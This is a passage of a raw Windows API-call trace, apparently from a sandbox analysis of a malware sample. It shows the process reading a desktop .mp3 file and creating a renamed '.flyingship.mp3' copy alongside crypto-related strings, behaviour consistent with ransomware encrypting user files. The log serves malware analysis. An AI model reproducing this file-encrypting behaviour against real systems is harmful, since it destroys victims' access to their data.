0x6bb518 [0076.002] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb518 [0076.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0076.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9708 [0076.002] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.002] PeekMessageW (in: lpMsg=0x61e3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3fc) returned 0 [0076.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0076.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb458 [0076.002] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0076.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0076.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0076.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0076.002] CryptDestroyHash (hHash=0x6b8b38) returned 1 [0076.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb478 [0076.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0076.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0076.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0076.002] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.002] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.002] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.002] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.002] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.002] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6egorexjkdl7op.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0076.003] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.003] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61e9f8 | out: lpNewFilePointer=0x0) returned 1 [0076.003] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0076.003] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0076.003] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0076.003] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db58 | out: hHeap=0x650000) returned 1 [0076.003] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.003] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.003] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1f38 | out: hHeap=0x650000) returned 1 [0076.003] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0076.003] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.003] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.003] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b38 | out: hHeap=0x650000) returned 1 [0076.003] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.003] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0076.003] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0076.003] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.003] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0076.003] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0076.003] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0076.003] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0076.003] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x698698 | out: hHeap=0x650000) returned 1 [0076.003] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0076.003] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0076.003] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0076.003] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0076.003] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0076.003] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3480 | out: hHeap=0x650000) returned 1 [0076.003] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0076.003] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0076.003] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0076.004] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0076.004] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3480 | out: hHeap=0x650000) returned 1 [0076.004] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0076.004] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3530 | out: hHeap=0x650000) returned 1 [0076.004] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.004] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0076.004] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0076.004] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.flyingship.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6egorexjkdl7op.flyingship.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0076.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0076.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0076.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0076.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db58 | out: hHeap=0x650000) returned 1 [0076.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.005] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1f38 | out: hHeap=0x650000) returned 1 [0076.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0076.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.005] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8ab8 | out: hHeap=0x650000) returned 1 [0076.005] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.005] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0076.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0076.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0076.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0076.005] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61ea48 | out: lpNewFilePointer=0x0) returned 1 [0076.006] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0xe811, lpOverlapped=0x0) returned 1 [0076.008] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x0, lpOverlapped=0x0) returned 1 [0076.008] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0076.008] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0076.008] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0076.009] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x32b0020 | out: hHeap=0x650000) returned 1 [0076.009] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0076.009] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0076.009] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db58 | out: hHeap=0x650000) returned 1 [0076.009] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.010] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x795ff8 | out: hHeap=0x650000) returned 1 [0076.010] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0076.010] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.010] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0076.010] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x795ff8 | out: hHeap=0x650000) returned 1 [0076.010] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0076.010] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0076.010] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db58 | out: hHeap=0x650000) returned 1 [0076.010] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0076.010] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.010] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0076.010] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0076.010] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0076.010] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.010] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0076.010] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0076.010] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0076.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0076.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0076.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0076.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0076.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0076.011] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0076.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0076.011] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0076.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0076.012] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0076.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0076.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0076.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0076.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0076.012] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0076.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0076.012] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0076.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0076.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0076.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0076.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0076.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0076.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0076.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0076.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0076.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0076.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0076.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc48 | out: hHeap=0x650000) returned 1 [0076.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.012] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0076.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0076.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0076.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0076.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0076.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc48 | out: hHeap=0x650000) returned 1 [0076.013] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0076.013] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0076.013] PeekMessageW (in: lpMsg=0x61dd8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61dd8c) returned 0 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0076.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.014] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, 